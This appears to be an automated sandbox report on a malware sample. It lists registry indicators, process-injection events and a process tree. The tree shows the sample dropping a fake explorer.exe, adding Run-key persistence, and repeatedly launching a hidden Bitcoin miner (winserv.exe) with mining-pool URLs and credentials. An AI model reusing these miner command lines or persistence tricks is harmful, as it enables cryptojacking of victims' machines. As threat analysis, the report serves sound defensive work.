description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Suspicious use of SetWindowsHookEx 64 IoCs
pid Process 1604 JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe 3500 explorer.exe 5768 explorer.exe 3660 explorer.exe 1896 explorer.exe 5332 explorer.exe 3156 explorer.exe 5536 explorer.exe 568 explorer.exe 1044 explorer.exe 2812 explorer.exe 2304 explorer.exe 2756 explorer.exe 6016 explorer.exe 3420 explorer.exe 4652 explorer.exe 3912 explorer.exe 4848 explorer.exe 5468 explorer.exe 3636 explorer.exe 5860 explorer.exe 876 explorer.exe 5536 explorer.exe 744 explorer.exe 1520 explorer.exe 1448 explorer.exe 4544 explorer.exe 1992 explorer.exe 1004 explorer.exe 5788 explorer.exe 1480 explorer.exe 4248 explorer.exe 4748 explorer.exe 464 explorer.exe 4960 explorer.exe 4572 explorer.exe 2016 explorer.exe 484 explorer.exe 4044 explorer.exe 1732 explorer.exe 5944 explorer.exe 960 explorer.exe 3680 explorer.exe 1108 explorer.exe 1260 explorer.exe 5832 explorer.exe 4904 explorer.exe 3272 explorer.exe 3660 explorer.exe 944 explorer.exe 5884 explorer.exe 2108 explorer.exe 5492 explorer.exe 5512 explorer.exe 1360 explorer.exe 5984 explorer.exe 4916 explorer.exe 5508 explorer.exe 2516 explorer.exe 1980 explorer.exe 4400 explorer.exe 4556 explorer.exe 760 explorer.exe 2604 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2528 wrote to memory of 3500 2528 cmd.exe 80 PID 2528 wrote to memory of 3500 2528 cmd.exe 80 PID 2528 wrote to memory of 3500 2528 cmd.exe 80 PID 1604 wrote to memory of 6072 1604 JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe 83 PID 1604 wrote to memory of 6072 1604 JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe 83 PID 1604 wrote to memory of 6072 1604 JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe 83 PID 1604 wrote to memory of 2924 1604 JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe 84 PID 1604 wrote to memory of 2924 1604 JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe 84 PID 1604 wrote to memory of 2924 1604 JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe 84 PID 1340 wrote to memory of 5768 1340 cmd.exe 87 PID 1340 wrote to memory of 5768 1340 cmd.exe 87 PID 1340 wrote to memory of 5768 1340 cmd.exe 87 PID 3500 wrote to memory of 2004 3500 explorer.exe 88 PID 3500 wrote to memory of 2004 3500 explorer.exe 88 PID 3500 wrote to memory of 2004 3500 explorer.exe 88 PID 3500 wrote to memory of 4832 3500 explorer.exe 89 PID 3500 wrote to memory of 4832 3500 explorer.exe 89 PID 3500 wrote to memory of 4832 3500 explorer.exe 89 PID 4908 wrote to memory of 3660 4908 cmd.exe 94 PID 4908 wrote to memory of 3660 4908 cmd.exe 94 PID 4908 wrote to memory of 3660 4908 cmd.exe 94 PID 5768 wrote to memory of 3348 5768 explorer.exe 95 PID 5768 wrote to memory of 3348 5768 explorer.exe 95 PID 5768 wrote to memory of 3348 5768 explorer.exe 95 PID 5768 wrote to memory of 4292 5768 explorer.exe 96 PID 5768 wrote to memory of 4292 5768 explorer.exe 96 PID 5768 wrote to memory of 4292 5768 explorer.exe 96 PID 3660 wrote to memory of 3288 3660 explorer.exe 101 PID 3660 wrote to memory of 3288 3660 explorer.exe 101 PID 3660 wrote to memory of 3288 3660 explorer.exe 101 PID 3660 wrote to memory of 1860 3660 explorer.exe 410 PID 3660 wrote to memory of 1860 3660 explorer.exe 410 PID 3660 wrote to memory of 1860 3660 explorer.exe 410 PID 944 wrote to memory of 1896 944 cmd.exe 103 PID 944 wrote to memory of 1896 944 cmd.exe 103 PID 944 wrote to memory of 1896 944 cmd.exe 103 PID 3688 wrote to memory of 5332 3688 cmd.exe 533 PID 3688 wrote to memory of 5332 3688 cmd.exe 533 PID 3688 wrote to memory of 5332 3688 cmd.exe 533 PID 1896 wrote to memory of 3408 1896 explorer.exe 109 PID 1896 wrote to memory of 3408 1896 explorer.exe 109 PID 1896 wrote to memory of 3408 1896 explorer.exe 109 PID 1896 wrote to memory of 5296 1896 explorer.exe 213 PID 1896 wrote to memory of 5296 1896 explorer.exe 213 PID 1896 wrote to memory of 5296 1896 explorer.exe 213 PID 4284 wrote to memory of 3156 4284 cmd.exe 326 PID 4284 wrote to memory of 3156 4284 cmd.exe 326 PID 4284 wrote to memory of 3156 4284 cmd.exe 326 PID 5332 wrote to memory of 2536 5332 explorer.exe 325 PID 5332 wrote to memory of 2536 5332 explorer.exe 325 PID 5332 wrote to memory of 2536 5332 explorer.exe 325 PID 5332 wrote to memory of 980 5332 explorer.exe 117 PID 5332 wrote to memory of 980 5332 explorer.exe 117 PID 5332 wrote to memory of 980 5332 explorer.exe 117 PID 3156 wrote to memory of 3160 3156 explorer.exe 122 PID 3156 wrote to memory of 3160 3156 explorer.exe 122 PID 3156 wrote to memory of 3160 3156 explorer.exe 122 PID 3156 wrote to memory of 3840 3156 explorer.exe 642 PID 3156 wrote to memory of 3840 3156 explorer.exe 642 PID 3156 wrote to memory of 3840 3156 explorer.exe 642 PID 6120 wrote to memory of 5536 6120 cmd.exe 231 PID 6120 wrote to memory of 5536 6120 cmd.exe 231 PID 6120 wrote to memory of 5536 6120 cmd.exe 231 PID 5536 wrote to memory of 5904 5536 explorer.exe 439
Processes
-
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe"1⤵
- Modifies visiblity of hidden/system files in Explorer
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1604 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas2⤵PID:6072
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe2⤵PID:2924
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵
- Suspicious use of WriteProcessMemory
PID:2528 -
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3500 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2004
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4832
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵
- Suspicious use of WriteProcessMemory
PID:1340 -
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5768 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3348
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4292
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵
- Suspicious use of WriteProcessMemory
PID:4908 -
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3660 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3288
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1860
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵
- Suspicious use of WriteProcessMemory
PID:944 -
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1896 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:3408
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5296
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵
- Suspicious use of WriteProcessMemory
PID:3688 -
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5332 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:2536
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:980
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵
- Suspicious use of WriteProcessMemory
PID:4284 -
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3156 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3160
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:3840
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵
- Suspicious use of WriteProcessMemory
PID:6120 -
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5536 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:5904
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:484
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5252
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:568 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:5560
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2084
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4816
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1044 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:552
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2784
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2244
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:2812 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:1552
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4320
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1160
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2304 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5264
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3464
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5508
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:2756 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2388
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3108
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5148
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:6016 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:536
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1456
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3764
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:3420 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4240
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵
- System Location Discovery: System Language Discovery
PID:2484
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5960
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4652 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:4248
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3040
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5784
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3912 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:940
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5028
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4200
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:4848 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3168
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4956
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1340
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5468 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:6132
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5084
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2232
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:3636 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵
- System Location Discovery: System Language Discovery
PID:5296
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3760
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2780
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:5860 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2536
-
-
